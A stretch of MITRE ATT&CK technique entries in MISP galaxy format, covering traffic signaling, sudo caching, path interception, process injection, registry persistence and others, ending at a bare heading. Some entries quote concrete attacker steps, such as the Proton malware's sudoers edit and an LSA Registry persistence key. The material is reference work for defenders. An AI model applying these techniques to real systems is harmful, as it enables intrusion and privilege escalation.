On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.

Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)

The tag is: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205"

Table 3847. Table References
Links
https://attack.mitre.org/techniques/T1205
https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-acis.html[https://www.fireeye.com/blog/threat-research/2015/09/synful_knock-_acis.html]
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/
https://www.amd.com/system/files/TechDocs/20213.pdf
https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN

Multiband Communication - T1026

This technique has been deprecated and should no longer be used.

Some adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.

The tag is: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026"

Table 3848. Table References
Links
https://attack.mitre.org/techniques/T1026
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Sudo Caching - T1206

The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code> that is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

Adversaries can abuse poor configurations of this to escalate privileges without needing the user’s password. <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user’s password. When <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.

The OSX Proton Malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \'Defaults !tty_tickets\' >> /etc/sudoers</code> (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.

The tag is: misp-galaxy:mitre-attack-pattern="Sudo Caching - T1206"

View relationships graph

Sudo Caching - T1206 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

Table 3849. Table References
Links
https://attack.mitre.org/techniques/T1206
https://www.sudo.ws/
https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does

Time Providers - T1209

The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Time Providers - T1209"

View relationships graph

Time Providers - T1209 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003" with estimative-language:likelihood-probability="almost-certain"

Table 3850. Table References
Links
https://attack.mitre.org/techniques/T1209
https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top
https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
https://github.com/scottlundgren/w32time
https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings
https://technet.microsoft.com/en-us/sysinternals/bb963902

Scheduled Transfer - T1029

Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.

When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029"

Table 3851. Table References
Links
https://attack.mitre.org/techniques/T1029

Shadow DNS - T1340

The process of gathering domain account credentials in order to silently create subdomains pointed at malicious servers without tipping off the actual owner. (Citation: CiscoAngler) (Citation: ProofpointDomainShadowing)

The tag is: misp-galaxy:mitre-attack-pattern="Shadow DNS - T1340"

Table 3852. Table References
Links
https://attack.mitre.org/techniques/T1340
https://blogs.cisco.com/security/talos/angler-domain-shadowing

Path Interception - T1034

This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).

Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)

There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

Unquoted Paths

Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:\safe path with space\program.exe"</code>). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)

PATH Environment Variable Misconfiguration

For example, if <code>C:\example path</code> precedes <code>C:\Windows\system32</code> is in the PATH environment variable, a program that is named net.exe and placed in <code>C:\example path</code> will be called instead of the Windows system "net" when "net" is executed from the command-line.

Search Order Hijacking

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program’s directory.

Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception - T1034"

Table 3853. Table References
Links
https://attack.mitre.org/techniques/T1034
https://capec.mitre.org/data/definitions/159.html
https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/
http://support.microsoft.com/KB/103000
https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464
https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://msdn.microsoft.com/en-us/library/ms682425
http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120
http://msdn.microsoft.com/en-us/library/ms687393
https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx

Location Tracking - T1430

An adversary could use a malicious or exploited application to surreptitiously track the device’s physical location through use of standard operating system APIs.

The tag is: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"

Table 3854. Table References
Links
https://attack.mitre.org/techniques/T1430
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.html

Service Execution - T1035

Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Service Execution - T1035"

View relationships graph

Service Execution - T1035 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 3855. Table References
Links
https://attack.mitre.org/techniques/T1035

Anonymity services - T1306

Anonymity services reduce the amount of information available that can be used to track an adversary’s activities. Multiple options are available to hide activity, limit tracking, and increase anonymity. (Citation: TOR Design) (Citation: Stratfor2012)

The tag is: misp-galaxy:mitre-attack-pattern="Anonymity services - T1306"

Table 3856. Table References
Links
https://attack.mitre.org/techniques/T1306

Process Hollowing - T1093

Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Endgame Process Injection July 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093"

View relationships graph

Process Hollowing - T1093 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"

Table 3857. Table References
Links
https://attack.mitre.org/techniques/T1093
http://www.autosectools.com/process-hollowing.pdf
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Obfuscate infrastructure - T1309

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1309"

View relationships graph

Obfuscate infrastructure - T1309 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331" with estimative-language:likelihood-probability="almost-certain"

Table 3858. Table References
Links
https://attack.mitre.org/techniques/T1309

Indicator Blocking - T1054

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the registry to make alterations.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1054"

View relationships graph

Indicator Blocking - T1054 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 3859. Table References
Links
https://attack.mitre.org/techniques/T1054
https://capec.mitre.org/data/definitions/571.html
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A
https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events
https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

Code Injection - T1540

Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.

With root access, ptrace can be used to target specific applications and load shared libraries into its process memory.(Citation: Shunix Code Injection Mar 2016)(Citation: Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access to higher permissions held by the targeted application by executing as the targeted application. In addition, the adversary may be able to evade detection or enable persistent access to a system under the guise of the application’s process.(Citation: Google Triada June 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Code Injection - T1540"

Table 3860. Table References
Links
https://attack.mitre.org/techniques/T1540
https://shunix.com/shared-library-injection-in-android/
https://fadeevab.com/shared-library-injection-on-android-8/
https://security.googleblog.com/2019/06/pha-family-highlights-triada.html

PowerShell Profile - T1504

Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1504"

View relationships graph

PowerShell Profile - T1504 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"

Table 3861. Table References
Links
https://attack.mitre.org/techniques/T1504
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6
https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html
http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

Software Packing - T1045

Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.

Adversaries may use virtual machine software protection as a form of software packing to protect their code. Virtual machine software protection translates an executable’s original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Software Packing - T1045"

View relationships graph

Software Packing - T1045 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

Table 3862. Table References
Links
https://attack.mitre.org/techniques/T1045
https://capec.mitre.org/data/definitions/570.html
http://en.wikipedia.org/wiki/Executable_compression
https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf

Biometric Spoofing - T1460

An adversary could attempt to spoof a mobile device’s biometric authentication mechanism, for example by providing a fake fingerprint as described by SRLabs in (Citation: SRLabs-Fingerprint).

iOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Biometric Spoofing - T1460"

View relationships graph

Biometric Spoofing - T1460 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"

Table 3863. Table References
Links
https://attack.mitre.org/techniques/T1460

Data Staged - T1074

Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)

Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Data Staged - T1074"

Table 3864. Table References
Links
https://attack.mitre.org/techniques/T1074
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
https://content.fireeye.com/m-trends/rpt-m-trends-2020

Execution Guardrails - T1480

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

The tag is: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480"

Table 3865. Table References
Links
https://attack.mitre.org/techniques/T1480
https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html

Process Injection - T1055

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

The tag is: misp-galaxy:mitre-attack-pattern="Process Injection - T1055"

Table 3866. Table References
Links
https://attack.mitre.org/techniques/T1055
https://capec.mitre.org/data/definitions/640.html
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.gnu.org/software/acct/
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
https://docs.microsoft.com/sysinternals/downloads/sysmon

Input Capture - T1056

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Input Capture - T1056"

Table 3867. Table References
Links
https://attack.mitre.org/techniques/T1056
https://capec.mitre.org/data/definitions/569.html
http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf

Process Discovery - T1057

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.

The tag is: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"

Table 3868. Table References
Links
https://attack.mitre.org/techniques/T1057
https://capec.mitre.org/data/definitions/573.html

Stage Capabilities - T1608

Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)

Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):

Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)

The tag is: misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608"

Table 3869. Table References
Links
https://attack.mitre.org/techniques/T1608
https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/
https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian
https://www.digicert.com/kb/ssl-certificate-installation.htm

Account Discovery - T1087

Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.

The tag is: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087"

Table 3870. Table References
Links
https://attack.mitre.org/techniques/T1087
https://capec.mitre.org/data/definitions/575.html
https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Valid Accounts - T1078

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)

The tag is: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"

Table 3871. Table References
Links
https://attack.mitre.org/techniques/T1078
https://capec.mitre.org/data/definitions/560.html
https://technet.microsoft.com/en-us/library/dn535501.aspx
https://technet.microsoft.com/en-us/library/dn487457.aspx

Multilayer Encryption - T1079

An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.

The tag is: misp-galaxy:mitre-attack-pattern="Multilayer Encryption - T1079"

View relationships graph

Multilayer Encryption - T1079 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 3872. Table References
Links
https://attack.mitre.org/techniques/T1079
http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840
https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html
https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Account Manipulation - T1098

Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.

The tag is: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098"

Table 3873. Table References
Links
https://attack.mitre.org/techniques/T1098
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670
https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
https://github.com/gentilkiwi/mimikatz/issues/92

Modify Registry - T1112

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system’s [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.

The tag is: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"

Table 3874. Table References
Links
https://attack.mitre.org/techniques/T1112
https://capec.mitre.org/data/definitions/203.html
https://technet.microsoft.com/en-us/library/cc732643.aspx
https://docs.microsoft.com/sysinternals/downloads/reghide
https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
https://technet.microsoft.com/en-us/library/cc754820.aspx
https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657
https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull

Authentication Package - T1131

Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)

Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.

The tag is: misp-galaxy:mitre-attack-pattern="Authentication Package - T1131"

View relationships graph

Authentication Package - T1131 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Authentication Package - T1547.002" with estimative-language:likelihood-probability="almost-certain"

Table 3875. Table References
Links
https://attack.mitre.org/techniques/T1131
https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
https://technet.microsoft.com/en-us/library/dn408187.aspx

Screen Capture - T1113

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113"

Table 3876. Table References
Links
https://attack.mitre.org/techniques/T1113
https://capec.mitre.org/data/definitions/648.html
https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8
https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

Dynamic DNS - T1311

Dynamic DNS is a method of automatically updating a name in the DNS system. Providers offer this rapid reconfiguration of IPs to hostnames as a service. (Citation: DellMirage2012)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311"

View relationships graph

Dynamic DNS - T1311 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333" with estimative-language:likelihood-probability="almost-certain"

Table 3877. Table References
Links
https://attack.mitre.org/techniques/T1311

Email Collection - T1114

Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.

The tag is: misp-galaxy:mitre-attack-pattern="Email Collection - T1114"

Table 3878. Table References
Links
https://attack.mitre.org/techniques/T1114
https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/

Input Prompt - T1411

